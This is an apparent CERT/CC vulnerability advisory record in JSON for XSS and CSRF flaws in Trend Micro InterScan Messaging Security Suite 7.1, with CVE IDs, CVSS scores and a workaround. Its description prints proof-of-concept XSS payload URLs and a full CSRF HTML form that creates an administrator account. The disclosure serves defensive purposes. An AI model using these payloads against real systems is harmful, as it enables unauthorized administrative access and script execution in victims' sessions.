{"vuid":"VU#471364","idnumber":"471364","name":"Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities","keywords":["Trend Micro","InterScan Messaging Security Suite","CSRF","cwe-352","xss","cwe-79"],"overview":"Trend Micro InterScan Messaging Security Suite Version 7.1-Build_Win32_1394 has been reported to be susceptible to cross-site scripting and cross-site request forgery vulnerabilities.","clean_desc":"Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) and cross-site request forgery (CWE-352) vulnerabilities. Cross-site scripting (CVE-2012-2995) (CWE-79)\nPersistent/Stored XSS\nhxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss\"><script>alert('XSS')</script> Non-persistent/Reflected XSS\nhxxps://127.0.0.1/initUpdSchPage.imss?src=\"><script>alert('XSS')</script> Cross-site request forgery (CVE-2012-2996) (CWE-352)\nCSRF add admin privilege account\n<html>\n<body>\n<form action=\"hxxps://127.0.0.1:8445/saveAccountSubTab.imss\" method=\"POST\">\n<input type=\"hidden\" name=\"enabled\" value=\"on\" />\n<input type=\"hidden\" name=\"authMethod\" value=\"1\" />\n<input type=\"hidden\" name=\"name\" value=\"quorra\" />\n<input type=\"hidden\" name=\"password\" value=\"quorra&#46;123\" />\n<input type=\"hidden\" name=\"confirmPwd\" value=\"quorra&#46;123\" />\n<input type=\"hidden\" name=\"tabAction\" value=\"saveAuth\" />\n<input type=\"hidden\" name=\"gotoTab\" value=\"saveAll\" />\n<input type=\"submit\" value=\"CSRF\" />\n</form>\n</body>\n</html>","impact":"An unauthenticated attacker may be able to execute arbitrary script in the context of a logged in user's session.","resolution":"We are currently unaware of a practical solution to this problem. Please consider the following workarounds.","workarounds":"Restrict access As a general good security practice, only allow connections from trusted hosts and networks.\nRestricting access would prevent an attacker from accessing the InterScan Messaging Security Suite using stolen credentials from a blocked network location.","sysaffected":"","thanks":"Thanks to Tom Gregory for reporting this vulnerability.","author":"This document was written by Jared Allar.","public":["http://cwe.mitre.org/data/definitions/352.html","http://cwe.mitre.org/data/definitions/79.html","http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html"],"cveids":["CVE-2012-2995","CVE-2012-2996"],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2012-07-30T17:55:12Z","publicdate":"2012-09-13T00:00:00Z","datefirstpublished":"2012-09-13T17:32:52Z","dateupdated":"2014-08-15T02:53:45Z","revision":18,"vrda_d1_directreport":"1","vrda_d1_population":"2","vrda_d1_impact":"3","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"0","cam_population":"0","cam_impact":"0","cam_easeofexploitation":"0","cam_attackeraccessrequired":"0","cam_scorecurrent":"0","cam_scorecurrentwidelyknown":"0","cam_scorecurrentwidelyknownexploited":"0","ipprotocol":"","cvss_accessvector":"N","cvss_accesscomplexity":"M","cvss_authentication":null,"cvss_confidentialityimpact":"P","cvss_integrityimpact":"P","cvss_availabilityimpact":"P","cvss_exploitablity":null,"cvss_remediationlevel":"U","cvss_reportconfidence":"UC","cvss_collateraldamagepotential":"ND","cvss_targetdistribution":"L","cvss_securityrequirementscr":"ND","cvss_securityrequirementsir":"ND","cvss_securityrequirementsar":"ND","cvss_basescore":"6.8","cvss_basevector":"AV:N/AC:M/Au:N/C:P/I:P/A:P","cvss_temporalscore":"5.5","cvss_environmentalscore":"1.38152301828188","cvss_environmentalvector":"CDP:ND/TD:L/CR:ND/IR:ND/AR:ND","metric":0.0,"vulnote":null}